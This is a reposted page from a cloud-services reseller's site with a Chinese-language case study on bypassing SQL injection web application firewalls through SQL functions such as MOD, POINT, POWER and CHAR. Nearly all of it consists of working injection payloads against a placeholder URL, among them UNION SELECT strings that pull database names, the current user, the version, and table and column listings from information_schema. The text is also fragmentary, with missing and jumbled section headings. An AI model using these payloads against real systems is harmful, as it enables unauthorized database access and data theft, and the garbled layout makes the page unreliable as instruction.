腾讯云授权服务中心
五万用户的选择,您身边的云计算顾问
发布日:2022-01-27 14:37 阅读数:
And 1=0 And false And 0 And 1 And 50=60 Any number that are not the same will equal to (0, false, null)kleiton0x7e通过 SQL 函数绕过 SQL 注入 WAF 的案例研究
And 1*0 And 1-1 And 0/1
http://website.com/index.php?id=1’ and 1*0 order by 10–
2) 使用MOD()
SELECT mod(10, 2);
http://website.com/index.php?id=1 and mod(29,9) Order by 10–
3) 使用POINT()
SELECT point(29, 9);
http://website.com/index.php?id=1 and point(29,9) Order by 10–
SELECT power(5,5);
例如:
http://website.com/index.php?id=1 and power(5,5) Order by 10–
http://website.com/index.php?id=1 % point(29,9) Order by 10–
2) 用于操作&
& = Bitwise And && = Logical And
例如:
http://website.com/index.php?id=1 && point(29,9) Order by 10–
3) 用于操作或
| = Bitwise OR || = Logical OR, sometimes use for Concatanation
例如:
http://website.com/index.php?id=1 || point(29,9) Order by 10–
Union Select null, null, null, null
UNION SELECT 0,0,0,0
http : //website.com/index.php?id =1 div 0 Union Select 0 , 0 , 0 , 0(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA), 0 , 0 –+”
2)使用假
UNION SELECT false,false,false,false
例如:
http : //website.com/index.php?id =1 div false Union Select false , false , false , false,SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA), false – +
UNION SELECT char(null),char(null),char(null),char(null) UNION SELECT char(false),char(false,char(false),char(false) UNION SELECT char(0),char(0),char(0),char(0) UNION SELECT char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c)
http://website.com/index.php?id=1 div char(false) Union Select “char(false) div char(false) Union Select char(false),char(false),char(false),char(false),concat(0x222f3e,0x3c62723e,0x3c62723e,’ ’,’Database :: ‘,database(),0x3c62723e,’User ::’,user(),0x3c62723e,’Version ::’,version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),char(false)–+”,char(false),char(false),char(false),char(false),char(false)–+
4) 使用算术或逻辑运算符
UNION SELECT (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0) UNION SELECT 34=35,34=35,34=35,34=35
例如:
http://website.com/index.php?id=1 div (0*1337-0) Union Select "(0*1337-0) div (0*1337-0) Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0),concat(0x222f3e,0x3c62723e,0x3c62723e,'<br>','Database ::',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version ::',version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),(0*1337-0)--+",(0*1337-0),(0*1337-0), (0*1337-0),(0*1337-0),(0*1337-0)--+
SELECT CHAR(NULL); → SELECT CHAR(0x4e554c4c); SELECT CHAR(0) → SELECT CHAR(0x30); SELECT MOD(29, 9); → SELECT MOD(0x3239, 0x34); SELECT POINT(29, 9); → SELECT POINT(0x3239, 0x39);
编辑:航网科技 来源:腾讯云
本文版权归原作者所有 转载请注明出处
Copyright © 2011-2020 www.hangw.com. All Rights Reserved 深圳航网科技有限公司 版权所有 增值电信业务经营许可证:粤B2-20201122 - 粤ICP备14085080号
微信扫一扫咨询客服
全国免费服务热线
0755-36300002